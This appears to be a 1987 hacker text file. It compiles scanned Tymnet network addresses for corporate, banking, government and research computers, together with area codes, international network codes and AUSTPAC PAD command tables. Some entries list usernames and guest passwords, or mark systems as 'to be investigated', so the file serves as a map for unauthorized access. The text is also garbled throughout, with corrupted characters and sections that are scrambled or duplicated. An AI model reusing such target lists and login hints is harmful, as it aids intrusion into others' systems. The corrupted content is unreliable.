311020100042 RDS# 12 REMOTE DATA SWITCH 311020100049 311020100050 INTERTEL 311023X|q0100051 PRIMENET 19.4.7 USCG.B 311020100055 PRIMENET 19.4.7 USCG.B 311020100059 PRIMENET 19.4.10.R7 PBN31 311020100067 WARNER COMPUTER SYSTEMS 311020100068 WARNER COMPUTER SYSTEMS 311020100071 RDS #12 311020100072 HP-3000 311020100080 311020100082 BANKERS TRUST CUSTOMER SERVICE 311020100084 D&B SYSTEM db003i 311020100087 NDC (host) REFER 20100028 311020100088 DUNN & BRADSTREET SYSTEMS 311020100089 VM 370 PRUSHARE 311020100108 311020100109 311020100133 3110oA,2600359243 PRIMECON NETWORK system 43 310600359244 PRIMECON NETWORK system 44 310600359245 PRIMECON NETWORK system 45 310600359246 PRIMECON NETWORK system 46 310600359247 PRIMECON NETWORK system 47 310600359248 PRIMECON NETWORK system 48 310600359249 PRIMECON NETWORK system 49 3106003604 VM/370 3106003605 fax 3106003623 3106003797 3106003828 TYMNET/AKNET Inter-link 3106003831 3106003846 (same as 5603) 3106003879 (CIER 1402) 3106003882 BEKINS COMPANY MUS/XA ACF/VTAM NETWps;ORK 3106003946 3106003973 FORD -ELECTRICAL ELECTRONIC DIRECTORY 3106003994 FORD -ELECTRICAL ELECTRONIC DIRECTORY 3106004007 3106004016 3106004041 RCA GLOBCOM'S PACKET SWITCHING SERICE 3106004092 3106004125 3106004129 (U:ABACIS) 3106004131 (U:ABACIS) 3106004137 TSO, VM/370 3106004173 fax 3106004174 VM/370 3106004202 3106004206 MAINSTREAMS 3106004210 fax 3106004288 3106004296 fax 3106004341 (host) 2 - VM/370, T - VM/370, 1,3,4,A,C,E,Z 3106004350 fax 310 qϕ6004365 NATIONAL LIBRARY OF MEDICINE'S TOXICOLOGY DATA NETWORK 3106004389 BUG BUSTING MACHINE OF NYN 3106004468 BETINS COMPANY MUS/AX ACF/VTAM NETWORK 3106004472 ROLM CBX DATA-SWITCHING 3106004499 MRCA 3106004514 US MISS (IS400) 3106004545 HMN 3106004555 #2 CASTER BACKUP 3106004573 3106004579 3106004580 TSO 3106004619 3106004645 3106004706 (host) 3106004726 NALCOCS DEC-10 3106004743 TYMNET INFO SERVICE 3106004755 STORE DEVELOPMENT MACHINE 3106004759 MC!rII (host) 3106004791 MIS GROUP/CAD DIVISION/COMPUTERLAND CORP. 3106004828 VTAM007 3106004865 GAB BUSINESS SERVICES 3106004869 3106004898 fax 3106004946 fax 3106004949 3106004956 (host) 0 - Vax, 1 - KL1, 2 - KL, 3 - IBM, 8 - VAX 2, 11 - PC1-130 3106004957 NEC SEMI-CUSTOM DESIGN CENTRE 3106005018 (host) 3106005034 (cier 1402) 3106005058 fax 3106005062 UIS SUPRA Host DIRNET 3106005080 fax 3106005082 COMPAQ 3106005107 3106005119 (host) 3106005124 OPERATIO"s5NAL INFO SYSTEM VAX 3106005136 3106005224 (host) 3106005229 UNIVERSITY OF PENCILVANIA SCHOOL OF ARTS AND SCIENCE 3106005267 CHANEL 01 3106005320 (Host) US DIGMAL COMPUTER SERVICES 3106005433 3106005438 3106005453 3106005463 VM/370 3106005528 STRATUS/32 3106005531 STRATUS/32 3106005539 VA II/730 3106005564 STRATUS/32 3106005566 Host sys A,1 - ALICE TRAC-CLUSTER TAURUS SYSTEM ALICE TOPS 20 B,2 - BAMBI TRAC-CLUSTER TAURUS SYSTEM BAMBI T#tj߹OPS 20 3 - 3M TRAC SERVICE system CHIP 4 - 3M TRAC SERVICE system DALE 5 - 3M TRAC SERVICE system ELLIOT 6 - 3M TRAC SERVICE system FLOWER 12,7 - 3M TRAC SERVICE system GRUMPY 8 - TRAC CLUSTER VIRGO, SYSTEM HAPPY 9 - TRAC CLUSTER VIRGO, SYSTEM ISABEL 10 - TRAC CLUSTER VIRGO, SYSTEM JUMBO $u# 11 - TRAC CLUSTER VIRGO, SYSTEM KANGA Numbers on this 13 - VAX host no longer 18 - DIGITAL ETHERNET work. They have 28 - unknown been replaced by 31 - HP-3000 Alphabetical codes. 32 - HP-3000 ie. for system 1 33 - HP-3000 type ALICE to 34 - HP-3000 connect. 35 - HP-3000 36 - unknown 37 - HP-3000 38 - unknown 40 - CPU-STP-A %v. 41 - HP-3000 43 - UNKNOWN 44 - ATLAS VAX 45 - FAXON INFO SERVICE 46 - ELECTRICAL PRODUCTS LABORATORY VASX II/750 47,48,49 - unknown 52 - SERC COMPUTER RESOURCES VAX 53 - unknown 54 - SERC COMPUTER RESOURCES VAX 55 - BDS UNIX 81,61 - TRAC CLUSTER LIBRA system LADY &w`Y 62 - TRAC CLUSTER LIBRA system MICKEY 63 - TRAC CLUSTER GEMINI system NEMO 64 - TRAC CLUSTER GEMINI system OWL 65 - TRAC CLUSTER LIBRA system PLUTO 67 - TRAC CLUSTER GEMINI system QUASAR 68 - unknown 70 - TRAC TIMESHARING VAX 71 - TRAC TIMESHARING VAX 72 - TRACE TIMESHARING VAX 'x& 73 - DIGITAL ETHERNET TERMINAL SERVER 74 - TRAC TIMESHARING VAX 76 - TRAC TIMESHARING VAX 81 - TRAC TIMESHARING VAX 3106005569 STRATUS/32 3106005571 STRATUS/32 3106005603 (Host) systems 1,2,3,4,5,C (5=Outdial) 3106005622 3106005683 TECHNICAL SUPPORT PRODUCTIONS 3106005697 3106005702 AUTH 3106005704 SPOOL 3106005705 3106005706 IFPSE 3106005708 IFPSE 3106005709 IFPSE 3106005711 IFXMP 3106005712 fax (cn3106005725 PRIMENET 20.2.1 BPORY 3106005744 (Cier 1402) 3106005755 Host system, active links = A,B,C,E,F,H,G,I,J,K,L,M,O,P,Q,R,S,T,U V,W,X,Y,Z 3106005758 SEI/MUS SYSTEM 3106005805 fax 3106005818 CORPORATE MANAGEMENT INFO SYSTEMS 3106005844 LOS ANGELES TIMES-WASHINGTON NEWS SERVICE 3106005846 VAX (Host) 3106005897 3106005903 3106005941 3106005969 PLESSEY SEMICONDUCTORS-IRVINE 3106005984 CREDIT AGRICOLE-USA 3106006046 31060z@NTYME II 3106001309 3106001316 fax 3106001320 fax 3106001328 3106001330 MULTICS (U: HVN 862-3642) 3106001341 3106001358 3106001361 THOMPSON COMPONENTS-MOSTEK CORPORATION 3106001383 host 1,A - TILLINGHAST BENEFITS TIME SHARING SYSTEM 2,C - TILLINGHAST INSURANCE TIMESHAEING SYSTEM 4,D - OUTDIALS 6 - TILLINGHAST VAX 8600 (tried to 10,G) 3106001391 SOCAL - SHIMS VAX 3106001399 C80 3{!ɕ106001400 TMCS PUBLIC NETWORK 3106001410 DATALYNX/3274 TERMINAL 3106001417 3106001434 (host system) - double digits, VM is active, tried to BZ 3106001443 fax 3106001467 STN INTERNATIONAL 3106001482 FNOC DDS 3106001483 ADR HEADQUARTERS 3106001487 3106001488 (Cier 1402) 3106001502 ARGON NATIONAL LAB 3106001508 IDC/370 3106001509 3106001514 (host) DC-10 3106001519 3106001533 SBS DATA CENTRE 3106001557 3106001560 3106001578 3106001589 3106001594 CON138 3|2106001611 3106001612 TYMNET-NEWARK/TSN-MRI inter-link 3106001616 TYMNET-5027/McGRAW HILL inter-link 3106001624 3106001642 Host, A - CORNELLA (system choices displayed) 3106001659 BYTE INFORMATIO EXCHANGE (U:GUEST, P/W:GUEST) 3106001663 PEOPLE LINK 3106001665 3106001676 VFI VAX MAIL 3106001709 3106001715 TYMNET/BOFANET inter-link 3106001727 3106001757 3106001763 HP-3000 3106001765 3106001766 PRIMENET 19.4.11 P750 3106001769 S.C. JOHNSON & SON R & D COMPUTER } SYSTEMS 3106001789 HOST WYLBUR, N - CICS TWX A,C,D,G,H,P,R,S,V,Z (unknown) 3106001799 (host) classes: 5 - VM/370, 20,23,26 UNKNOWN (TRIED TO 32) 3106001807 fax 3106001817 MITEL BOCA RATON 3106001819 TMCS PUBLIC NETWORK 3106001831 MULTICS 3106001842 fax 3106001844 fax 3106001851 fax 3106001853 fax 3106001854 3106001857 fax 3106001864 SUNGARDS CENTRAL COMPUTER FACILITY NETWORKS 3106001873 MULTICS MR10.2I 3106001874 3106001880 fax 3106001881 31060018~;Jo92 PRIMENET (certain hours) 3106001897 3106001912 3106001977 host (type VAX) 3106002040 fax 3106002041 3106002046 MITEL CORP IN KANATA (type DIAL for outdial) 3106002050 TYMNET/BOFANET inter-link (U:ABACIS, SFDCS1) 1 - link, 2 - SFDCS1 (U:DIRECTOR), 3, - ABACIS (U:ABACIS) A - ABACIS 2 (note, Abacis may be used as a U/N for many systems on tymnet) 3106002060 3106002070 3106002086 3106002095 COMODEX ONLINE SYSTEM 310600ˎ)2098 D & B (U:COMMANDO,DIRECTOR,FUCK) 3106002099 D & B (U:COMMANDO,ASSASIN,SHIT) 3106002100 D & B (U:COMMANDO,DIRECTOR,FUCK,RAIDER) 3106002109 TYMNET/15B (inter-link) 3106002118 PACX host 310600216401 MITRE SYSTEM 310600216402 MITRE WASHINGTON LOCAL AREA NETWORK 3106002170 TSO 3106002179 3106002188 fax 3106002196 3106002200 3106002201 3106002212 3106002222 fax 3106002286 PRIMENET 19.3.6/7.R4.e TFGI 3106002299 CONSILIUM 3106002306 3106002314 fax 310)6002320 3106002329 MFE 3106002330 fax 3106002384 3106002387 3106002391 3106002408 3106002418 UNC VAX 3106002443 DATAHUB 3106002445 3106002446 310600245301 SYSTEM SELECT 310600245302 PRIMENET 19.4.5 SYS B 310600245303 INSTITUTE OF NUCLEAR POWER OPERATIONS 3106002470 fax 3106002496 NOS SOFTWARE SYSTEM 3106002519 fax 3106002537 fax 3106002539 TYMNET/CIDN Inter-link 3106002545 CENTRE FOR SEISMIC STUDIES 3106002578 SEL 3106002580 3106002603 MULTICS systemua M 3106002609 CON5 3106002614 host 3106002623 VAX/VMS (U:GUEST) 3106002624 SUNEX-2060 TOPS-20 3106002632 3106002635 QUOTDIAL 3106002646 fax 3106002657 3106002667 3106002677 THE TIMES 3106002694 PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,STRATUS-2 3106002700 ANALYTICS SYSTNE 3106002709 AUTONET 3106002713 fax 3106002730 3106002732 fax 3106002744 3106002765 MULTICS 3106002768 (cier 1402) 3106002779 SCJ TIMESHARING 3106002790 VM/370 3106002800 310600280ʋrI7 ISC (host) 3106002824 3106002842 3106002843 3106002851 CHEM NETWORK DTSS 3106002864 RCA SEMICUSTOM 3106002871 (same as 5603) 3106002875 (cier 1402) MTECH/COMMERCIAL SERVICES DIVISION 3106002889 3106002901 fax 3106002910 (CIER 1402) 3106002921 CHRYSLER NETWORK 3106002971 FTR005I 3106002991 US MIS IS400 3106002995 VAIL VAX 3106002998 TYMNET/FIRN DATE NETWORK Inter-link 3106003002 MULTICS 3106003009 3106003028 DCOM class - 0 3106003030 DCOM class - 0 *investigate* 3106003036 3106003050 ATPCO FARE INFORMATION SYSTEM 3106003062 (Host) class 0,1 ** to be investigated ** 3106003079 VM/370 3106003092 TYMNET/PROTECTED ACCESS SERVICE SYSTEMS Inter-link 3106003168 VM/370 3106003214 VM/370 3106003220 VM/370 3106003221 VM/370 3106003248 fax 3106003284 COMPUFLIGHT 3106003286 VAX 3106003295 TYMNET/PROTECTED ACCESS SERVICE SYSTEMS Inter-link (U:ABACIS) 3106003297 TYMNET/PROTECTED ACCESS SERVICE SYSTENS Inter-link (n%cU:ABACIS) 3106003310 3106003321 3106003356 3106003365 3106003373 IOCSQ 3106003394 (HOST WYN) 1 - VM/370, 2 - VM/370, 3 - IKJ53020A, 5 - VM/370 6 - NARDAC - NARDAC 3106003420 fax 3106003443 3106003520 fax 3106003527 3106003529 (CIER 1402) 3106003534 3106003564 (CIER 1402) 3106003568 OAK TREE SYSTEMS LTD 3106003572 NORTH AMERICA DATA CENTRE 3106003579 310600359241 PRIMECON NETWORK system 41 310600359242 PRIMECON NETWORK system 42 3107,̹....EAST TENNESSEE 616......WEST MICHIGAN 617......EAST MASSACHUSETTES 618......SOUTH ILLINOIS 619......SOUTHERN CALIFORNIA 701......NORTH DAKOTA 702......NEVADA 703......VIRGINIA EXCEPT SOUTHEAST 704......WEST NORTH CAROLINA 705......EAST ONTARIO 706......NORTHWEST MEXICO 707......NORTHWEST CALIFORNIA 708...... 709......NEW FOUNDLAND 712......WEST IOWA  gxN 713......SOUTHEAST TEXAS/HOUSTON 714......ORANGE COUNTY CALIFORNIA 715......NORTH WISCONSON 716......WEST NEW YORK 717......EAST CENTRAL PENNSYLVANIA 718......QUEENS & BROOKLYN NY 719...... 800......WIDE AREA TELECOMMUNICATION SER. 801......UTAH 802......VERMONT 803......SOUTH CAROLINA 804......SOUTHWEST VIRGINIA 805......THOUSAND OAKS AREA CALFORNIA 806......NORTH TEXAS  ኉ 807......WEST ONTARIO 808......HAWAII 809......BAHAMAS CARIBEAN 812......SOUTH INDIANA 813......SOUTHWEST FLORIDA 814......NORTHWEST CENTRAL PENNSYLVANIA 815......NORTHWEST ILLINOIS 816......NORTH MISSOURI 817......NORTH CENTRAL TEXAS 818......NORTH LA 819......WEST QUEBEC 900......DIAL IT 901......WEST TENNESSEE 902......NOVA SCOTIA 903......  /904......NORTH WEST FLORIDA 905......MEXICO CITY 906......MICHIGAN PENINSULA 907......ALASKA 908...... 909...... 912......SOUTH GEORGIA 913......NORTH KANSAS 914......SOUTHEAST NEW YORK 915......WEST TEXAS 916......NORTHEAST CALIFORNIA 917...... 918......NORTHEAST OKLAHOMA 919......EAST NORTH CAROLINA ------------------------------------------------------------------ (------------- Here is the thing You have probably been waiting for. This is the list of NUA's I managed to compile over a four year period. It has been been updated quite frequently, so it should be accurate, however most of the areas have not been re-sprinted, or re-scanned if you prefer, so there will be quite a few new systems out there. -------------- NUA's LISTING -------------- T Y M N E T 310600xxxx Sprint, by ----====+> THE FORCE <+====---- From the Depths of - THE REA t LM - last Update: 05/03/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3106 GATEWAYS 3106000000 EXAR CORP VAX 3106000010 EXAR CORPORATION VAX 11/8600 VMS4.4 3106000023 3106000032 3106000034 3106000050 NLM MIS bsd unix 3106000060 3106000065 3106000066 BCS 3106000071 COMODITY SYSTEM 3106000081 COMPUTONE 3106000093 3106000096 REMOTE COMPUTING 3106000098 LOCKHEED DATAPLAN 3106000101 SIO 3106000102 RU20 31060001ik13 1=LINK SYS, 3=BANK OF USA (U:ABACIS, DIRECTOR) 3106000155 I.P. SHARP ASSOCIATES INC 3106000173 TYMNET/CODAN NET. Inter-link 3106000179 LBL (host) 3106000188 3106000210 3106000227 3106000241 host A,4 BAIFS BANK OF AMERICA S,3 SFDCS1 3106000249 3106000280 HONEYWELL MPL 3106000289 ROSS SYSTEM (32,26,2,3,12,20,21) 7,5,17,18,47,51, A - unknown VAX systems 14,15 - RSTS ROSS SYSTEMS 9,43,44,45,48 - MICRO VMS VAX 3106 000307 INFOMEDIA SERVICE CENTRE ONE TOPS 20 3106000315 3106000327 3106000331 (VM/370 system) 3106000377 MONSANTO AD RESEARCH PRODUCTION APPLICATION NETWORK 3106000379 3106000401 TMCS PUBLIC NETWORK 3106000411 TYMNET/BOSTON/TNS-PK1 interlink 3106000423 CORPORATE COMPUTER SERVICES 3106000424 (link to 4 VM/370 systems) 3106000428 AAMNET 3106000439 MIS 2 HP-3000 3106000463 SIGNETICS VM/370 3106000464 3106000496 fax 3106000497 UBS COMPUTER SYSTEMS (host) 31060050498 3106000515 ONTYME II 3106000581 BIBLIOGRAPHICAL RETRIEVAL SERVICE 3106000585 C/C/M 3106000619 SPNB VM/370 3106000632 TYMNET/TRWNET inter-link 3106000633 PUBLIC TYMNET/TRWNET INTERLINK 3106000636 LINK TO TRAC SYSTEMS (over one 120 terminals) 3106000646 3106000664 3106000674 3106000685 MTS-A RESEARCH (HOST) 10 - TOPS-20, 12 - UNKNOWN 14 - UNKNOWN, 20 MTS(C) TOPS-20 30 - MTS(F) TOPS-20, 32 UNKNOWN 3106000704 TYMNET-CUP(704)/DUBB-NTS(4) inter-link 3106000715 TYMNET TEST system 3106000729 (VM/370 system) 3106000731 3106000742 LADC L66A 3106000755 CORPORATE COMPUTER SERVICES 3106000759 3106000760 DEC host Solar Cae/Cam 3106000761 DOJ host 3106000788 TYMNET-6754/McGRAWHILL inter-link 3106000793 J&J host 3106000798 3106000800 link to: CSG VAX, CYBER 815, SB1, SB2, SB3, SCN-NET 3106000821 3106000832 ONTYME II 3106000842 3106000859 3106000871 3106000898 y^vF P&W 3106000932 3106001010 DITYMNET01 3106001024 3106001030 3106001036 IBM1 3106001042 IDC/370 3106001043 3106001053 STRATEGIC INFORMATION 3106001056 SYNTEX TIMESHARING 3106001105 host SGNY 1 - VAX II PRODUCTIONS SYSTEM 3 - VAX II PRODUCTIONS SYSTEM (tried to 5) 3106001110 3106001134 COMPUSERVE 3106001141 MESSAGE SERVICE SYSTEM (FOX) 3106001143 fax 3106001152 3106001158 TYMNET USER SERVICE 3106001227 ACF2 3106001288 3106001304 O6oxYELAND ICEPAC 2740 INDONESIA SKDP 5101 IRISH REP EIRPAC 2724 ISRAEL ISRANET 4251 ITALY ITALCABLE 2227 ITALY ITAPAC 2222 JAPAN VENUS-P 4408 JAPAN DDX-P 4401 LUXEMBOURG LUXPAC 2704 LUXENBOUTG LUXPAC-PSTN 2709 MALAYSIA MAYPAC 5021 MEXICO TELEPAC 3340 NETHERLANDS DATANET 1 7cW 2041 NETHERLANDS DABAS 2044 NETHERLANDS DATANET 1 2049 NEW ZEALAND PACNET 5301 NORWAY DATAPAK 2422 OMAN - - PANAMA INTELPAQ - PHILIPPINES GMCR 5150 PHILIPPINES PHILCOM - PORTUGAL TELEPAC 2680 PORTUGAL SABD 2682 PUERTO RICO UDTC 3301 REUNION DOMPAC 6470 SINGAPORE 8;MQ TELEPAC 5252 SOUTH AFRICA SAPONET 6550 SOUTH KOREA DACOM-NET 4501 SPAIN TIDA 2141 SPAIN IBERPAC 2145 SWEDEN DATAPAK 2402 SWEDEN TELEPAK 2405 SWITZERLAND TELEPAC 2284 SWITZERLAND RADIO SUISSE 2289 TAIWAN UDAS 4877 TAIWAN PACNET 4872 THAILAND IDARC 5200 TRINIDAD DATANET-1 3740 TRIN9ւIDAD TEXDAT 3745 UN.ARAB EMIRTS. TEDAS - UK PSS 2342 UK IPSS 2341 USA ACCUNET 3134 USA ALASKANET 3135 USA AUTONET 3126 USA COMPUSERVE 3132 USA DATA TRNSPORT 3102 USA FTCC 3124 USA MARKNET 3136 USA MCII-IMPACS 3104 USA RCA-LSDS 3:\v113 USA ITT-UDTS 3103 USA TELENET 3110/3125 USA TRT-DATAPAK 3119 USA TYMNET 3106 USA WUTCO 3101 END END 2402 SWEDEN TELEPAK 2405 SWITZERLAND TELEPAC 2284 SWITZERLAND RADIO SUISSE 2289 TAIWAN UDAS 4877 TAIWAN PACNET 4872 THAILAND IDARC 5200 TRINIDAD DATANET-1 3740 TRIN;P...SOUTHEAST FLORIDA 306......SASKATCHEWAN 307......WYOMING 308......WEST NEBRASKA 309......NORTH CENTRAL ILLINOIS 312......NORTHEAST ILLINOIS 313......EAST MICHIGAN 314......EAST MISSOURI 315......NORTH CENTRAL NEW YORK 316......SOUTH KANSAS 317......CENTRAL INDIANA 318......LOUISIANA EXCEPT SOUTHWEST 319......EAST IOWA 401......RHODE ISLAND 402......EAST NEBRASKA 40, 3......ALBERTA 404......NORTH GEORGIA 405......OKLAHOMA EXCEPT NORTHEAST 406......MONTANA 407...... 408......VENTURA CALIFORNIA 409......SOUTHWEST TEXAS 412......SOUTHWEST PENNSYLVANIA 413......WEST MASSECHUSETTES 414......EAST WISCONSON 415......SAN FRANSISCO AREA CALIFORNIA 416......TORONTO AREA CANADA 417......SOUTHWEST MISSOURI 418......QUEBEC CITY AREA QUEBEC 419......NORTHWEST OHIO 501......ARKANSAS 502......WEST KENTUCKY 503......OREGON 504......SOUTHWEST LOUISIANA 505......NEW MEXICO 506......NEW BRUNSWICK 507......SOUTH MINNESOTA 508...... 509......EASTERN WASHINGTON 512......SOUTH TEXAS 513......SOUTHWEST OHIO 514......MONTREAL AREA QUEBEC 515......CENTRAL IOWA 516......LONG ISLAND NEW YORK 517......"GCENTRAL MICHIGAN 518......EAST NEW YORK 519......SOUTH ONTARIO 601......MISSISSIPPI 602......ARIZONA 603......NEW HAMPSHIRE 604......BRITISH COLUMBIA 605......SOUTH DAKOTA 606......EAST KENTUCKY 607......SOUTH CENTRAL NEW YORK 608......SOUTHWEST WISCONSON 609......SOUTH NEW JERSEY 612......CENTRAL MINNESOTA 613......OTTAWA AREA ONTARIO 614......EAST CENTRAL OHIO 615..:+ome of the smaller cities. (Yes The Operators are there to be abused). Anyway, this will help with at least the US codes. BELL SYSTEM AREA CODES IN NUMERIC ORDER FOR THE USA AND PARTS OF CANADA. ------------------------------------------------------------------------------- 201......NORTH NEW JERSY 202......WASHINGTON DC 203......CONNECTICUT 204......MANITOBA 205......ALABAMA 206......WESTERN WASHINGTON 207......MAINE PD 208......SOUTH IDAHO 209......STOCKTON AREA CALIFORNIA 212......NEW YORK/NEW YORK CITY 213......LOS ANGELOS CALIFORNIA 214......NORTHEAST TEXAS 215......SOUTHEAST PENNSYLVANIA 216......NORTHEAST OHIO 217......CENTRAL ILLINOIS 218......NORTH MINNESOTA 219......NORTH INDIANA 301......MARYLAND 302......DELEWARE 303......COLORADO 304......WEST VIRGINIA 305...+g------------------------ There are 2 basic NUA formats. There is the logical structure and the stupid one. There are few exceptions like AUSTPAC NUA's which are just plain crazy. The best example to demonstrate would be two NUA's one on TYMNET, other on TELENET both of which access the same system: TELENET 0311030100341 if you can brake up the NUA into it's components this is what you obtain: 0 3110 301 00 341 Specifi,otes DNIC Address Area Code nothing Host International for TELENET much Address Connection It's important to note that from the TELENET PAD, the NUA would become C 301 341, so since you are likely to come accross a US made NUA listing of Telenet, to convert the NUA's into a more conventional form, just add the 03110 prefix and enough zeroes in between the area code and Address to give a total of-N_ 8 digits. (trailing digits not included) TYMNET 0310600157241 Again brake up the NUA into its components. 0 3106 00 1572 41 Specifies DNIC Address Area, no Host Trailing International for TYMNET particular Address Digits Connection pattern to be used by .!local host. The major ares on TYMNET are 00, 07 and 90. There are a lot of others but they don't have significantly large numbers of NUA's and most of them need two trailing digits which are often somewhere between 01-99. There could be some sort of logical format to TYMNET, but as yet, I haven't discovered it. Thus basically the two formats emerge. 0311030100341xx and 03106001572xx where xx are the trailing dig/@its to provide host with more specific info if required. The NUA's can be up to 15 digits in most cases and the corresponding phone area code is used in the NUA, with exception of TYMNET, ITAPAC and few others. America likes to be different from the rest of the world, as demonstrated by BELL Standards, so they naturally insist on having a slighly different format to their NUA's. Us PADS do no not have the zero prefix, so just remember to leave it out. (Now don't ask0 me why, just do it.) There are few other exceptions to the universal NUA formats and australia has one of them. AUSTPAC NUA's are reasonably unique in that the have a general format of their own. They may look like random assortments of numbers at first, but there is a definate pattern.(Thank God for that) Most NUA on AUSTPAC are in the follwing series ie: 224122000, 224123000, 224220000, 224221000 etc Basically the last digits reain more or less in their low values. ie most NUA's1 will be in the series 224122000 - 224122020 for example, with very few having the end value greater than twenty. Again, there may be two trailing digits. The final exception I have found is in the case of DIALNET which is a very small network not even worth bothering about, unless you want to access DIALCOM SYSTEMS in countries with no Public Data network of their own. Their NUA's are of the form 9000xx and are accessibly through primecon systems only. (perhaps there are other r2d/{"outes but as yet I haven't found them) INTERNATIONAL DNICS ------------------- The following is a table of all the current networks I have been able to track down, some of the blanks are yet to be filled in. Unfortunatelly not all are serviced by either MIDAS or AUSTPAC, so you may need to route your connections very carefully if you want to play with a system in SAUDI ARABIA and in other exotic places. COUNTRY NETWORK DNIC COUNTRY NETWORK DNI3q#C ---------------------------------------------------------------------------- ARGENTINA INTERDATA 7220 AUSTRALIA MIDAS 5053 AUSTRALIA AUSTPAC 5052 AUSTRIA RADIO AUSTRIA 2329 AUSTRIA DATEX-P 2322 BAHAMAS IDAS 3406 BAHRAIN BAHNET 4263 BARBADOS IDAS 3423 BELGIUM DCS 2062 BELGIUM - 2068 BELGIUM - 4qa 2069 BERMUDA BERMUDANET 3503 BRAZIL INTERDATA 7240 CANADA GLOBEDAT 3025 CANADA INFOSWITCH 3029 CANADA DATAPAC 3020 CAYMAN ISLANDS - 3463 CHILE INTERDATA 7300 COLUMBIA DAPAQ-INTER. 3107 COTE D IVOIRE SYTRANPAC 6122 DENMARK DATAPAK 2382 EGYPT ARENTO - FINLAND FINPAK 2442 FRANCE 5 TRANSPAC 2080 FRANCE NTI 2081 FRENCH ANTILLES DOMPAC 3400 FRENCH GUIANA DOMPAC 7420 FRENCH POLYNESIA TOMPAC 5470 GABON GABONPAC 6282 GERMANY(FED REP) DATEX-P 2624 GERMANY(FED REP) DATEX-P INT 2624 GREECE HELPAC 2022 GUATEMALA GUATEL - HONDURAS - - HONG KONG DATAPAK 4545 HONG KONG IDAS 4542 IC ]r | Eg: PAR1:001,5 5:001, | 8:000 -------------------------------------------------------------- SET? To set and read | PAR | Eg: PAR3:0, 5:1 -----------------------!v/a--------------------------------------- OTHER PAD COMMANDS PAD COMMAND EXAMPLE FUNCTION ============================================================== PROFnn PROF10 | To assign all the PAD | parameters the values | in specified profile -------------------------------------------------------------- RESET RESET | To reset t" R*he virtual INT INT | call. To transmit an | interrupt packet to | the correspndent. -------------------------------------------------------------- SET SET 2:0 | To set or change | parameter values | parameters desired ----------------------------------------------#nSg---------------- ? ?238221000 | Call request-Set up a | call -------------------------------------------------------------- PAD INDICATIONS ASSOCIATED WITH INCOMING EVENTS ============================================================== INDICATION FORMAT | EXPLANATION ============================================================== RESET cause | Reset of call/circuit -----$K>--------------------------------------------------------- COM | Call connected -------------------------------------------------------------- COM | There is an incoming call | Applies to receiving C-DTE -------------------------------------------------------------- CLR cause | Call/circuit cleared -------------------------------------------------------------%ua<- AUSTPAC | Identifier -------------------------------------------------------------- ERROR | Error in PAD command -------------------------------------------------------------- AUSTPAC MESSAGES - BRIEF CODE | CAUSE ============================================================== CLR OCC | NUMBER BUSY CLR INV | INVALID REQUEST FACILITY CLR RNA | REVERSE CHARGING ACCEPTAN&zCE NOT SUBSCRIBED CLR NC | NO CIRCUITS CLR DER | OUT OF ORDER CLR NA | ACCESS BARRED CLR NP | NO PORT CLR RPE | REMOTE PROCEDURE ERROR CLR ERR | LOCAL PROCEDURE ERROR CLR DTE | DTE ORIGINATED CLR ID | INCOMPATIBLE DESTINATION CLR CONF | CLEAR CONFIRMATION CLR PAD | PAD ORIGINATED CLEARED RESET PAD | PAD ORIGINATED RESET RESET NC | NO CIRCUITS'혀 RESET 01 | OUT OF ORDER RESET RPE | REMOTE PROCEDURE ERROR RESET ERR | LOCAL PROCEDURE ERROR ============================================================== AUSTPAC MESSAGES - EXPLANATION CLR OCC : The called party is engadged in other calls and unable to accept the incoming call CLR INV : Invalid facility requested by calling DTE. Eg: Invalid NUI. CLR RNA : The called party does not accept rever(u7se charging. CLR NC : A temporary network fault of network congestion RESET NC : As above CLR DER : Called party is out of order (System down etc.) RESET DER: As above CLR NA : The calling DTE os not permitted to obtain the connection to the called DTE (Eg: CUG) CLR NP : The address specified is outside the numbering plan or is unassigned. CLR RPE : A procedure error has been detected at the remote DTE n)Ketwork interface RESET RPE: As above CLR ERR : A procedure error caused by the local DTE is detected by the PAD (Eg: Incorrect format) RESET ERR: Same as with CLR ERR CLR DTE : Remote DTE has cleared or reset the call RESET DTE: As above CLR ID : The call is not compatible with the remote destination. CLR CONF : Response of PAD to valid clearing by the C-DTE CLR PAD : The PAD has cleared the call at the invitation of *# the correspondent. RESET PAD: The PAD has reset the call (Eg: Loss of input characters) -------------------------------------------------------------- Note: These codes will be followed by a 3 digit code. These are diagnostic codes which are used by Telecom maintenance staff. MISC. AUSTPAC NOTES PAD recall character : Ctrl 'P' =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= N U A S T R U C T U R E S -----U==================================== AUSTPAC PAD PROFILES A profile is a snapshot of all of the current values of PAD parameters. A profile is set for each C-DTE. A standard profile is is a given pre-defined set of PAD parameter values which may correspond to a specific terminal or family of terminals to an application or a family of applications.There are 13 standard profiles. PAR Xfr PROFILE NUMBER REF 0 1 2 3 4 5 6 7 8 9 10 11 12 ------------------------------------------------------------------------ 1 1 0 0 1 1 1 1 1 1 1 1 0 1 2 1 0 0 0 0 0 1 1 1 0 1 0 0 3 126 0 0 2 2 126 126 2 2 126 2 0 126 4 0 20 10 80 40 200 0 0 0 3 0 3 0 bP 5 1 0 1 0 0 1 1 1 1 0 1 0 1 6 1 0 0 1 1 1 1 1 1 1 1 0 1 7 2 2 21 21 21 21 21 8 21 1 21 21 2 8 0 0 0 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 4 7 0 4 7 0 4 0 0 10 0 0 0 0 0 0 0 0 72 0 0 0 0 11 Cannot be set: Not pred-defined in any profile 12 1 0 1 0 0 1 1 1 1 0 1 0 1 13 0 0 0 0 0 0 0 0 1 0 0 0 0 14 0 0 0 0 0 0 0 0 7 0 4 0 0 15 0 0 0 0 0 0 0 0 0 0 1 0 0 16 8 8 8 8 8 8 8 8 8 8 8 8 8 17 24 24 24 24 24 24 24 24 24 24 24 24 24 18 42p 42 42 42 42 42 42 42 42 39 10 42 42 ------------------------------------------------------------------------ PARAMETER VALUES IN EACH STANDARD PROFILE PROFILE EXPLANATIONS 0 : Simple profile defined in CCITT Rec X.28; echo by PAD; NO padding after or ; NO idle timer delay. PSTN customers operating at up to 300 BPS or 1200 BPS are usually assigned this profile. 1 : Transparent profile define Ed in CCITT Rec X.28; suitible for low speed computer port (LSCP) 2 : Profile suitible for LSCP.Note that this is the only LSCP 